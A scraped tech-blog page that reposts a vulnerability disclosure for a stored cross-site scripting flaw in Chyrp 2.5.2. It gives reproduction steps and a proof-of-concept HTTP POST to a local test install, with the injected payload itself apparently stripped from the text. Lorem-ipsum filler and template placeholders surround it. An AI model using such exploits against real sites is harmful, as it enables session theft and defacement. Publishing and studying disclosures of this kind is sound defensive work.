PHL Tech Magazine

Post: Chyrp 2.5.2 Cross Site Scripting

coder_prem

coder_prem

Hi, I'm Prem. I'm professional WordPress Web Developer. I developed this website. And writing articles about Finance, Startup, Business, Marketing and Tech is my hobby.
Hope you will always get informative articles which will help you to startup your business.
If you need any kind of wordpress website then feel free to contact me at webexpertprem@gmail.com

Categories



Chyrp 2.5.2 Cross Site Scripting

# Chyrp 2.5.2 – Stored Cross-Site Scripting (XSS)
# Date: 2024-04-24
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://github.com/chyrp/
# Software Link: https://github.com/chyrp/chyrp/archive/refs/tags/v2.5.2.zip
# Version: 2.5.2
# Tested on: MacOS
### Steps to Reproduce ###
– Login from the address: http://localhost/chyrp/?action=login.
– Click on ‘Write’.
– Type this payload into the ‘Title’ field: “>
– Fill in the ‘Body’ area and click ‘Publish’.
– An alert message saying “Stored” will appear in front of you.
### PoC Request ###
POST /chyrp/admin/?action=add_post HTTP/1.1
Host: localhost
Cookie: ChyrpSession=c4194c16a28dec03e449171087981d11;
show_more_options=true
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0)
Gecko/20100101 Firefox/124.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,
*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;
boundary=—————————28307567523233313132815561598
Content-Length: 1194
Origin: http://localhost
Referer: http://localhost/chyrp/admin/?action=write_post
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
—————————–28307567523233313132815561598
Content-Disposition: form-data; name=”title”
“>
—————————–28307567523233313132815561598
Content-Disposition: form-data; name=”body”

1337

—————————–28307567523233313132815561598
Content-Disposition: form-data; name=”status”
public
—————————–28307567523233313132815561598
Content-Disposition: form-data; name=”slug”
—————————–28307567523233313132815561598
Content-Disposition: form-data; name=”created_at”
04/24/24 12:31:57
—————————–28307567523233313132815561598
Content-Disposition: form-data; name=”original_time”
04/24/24 12:31:57
—————————–28307567523233313132815561598
Content-Disposition: form-data; name=”trackbacks”
—————————–28307567523233313132815561598
Content-Disposition: form-data; name=”feather”
text
—————————–28307567523233313132815561598
Content-Disposition: form-data; name=”hash”
11e11aba15114f918ec1c2e6b8f8ddcf
—————————–28307567523233313132815561598–

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:’yyyy-MM-dd’ }} {{ x.ux * 1000 | date:’HH:mm’ }} CET+1


{{ x.comment }}

The post Chyrp 2.5.2 Cross Site Scripting appeared first on DIGITALIVE.WORLD.

Lora Helmin

Lora Helmin

Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.

Leave a Reply

Your email address will not be published. Required fields are marked *

Related Popular Posts

Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.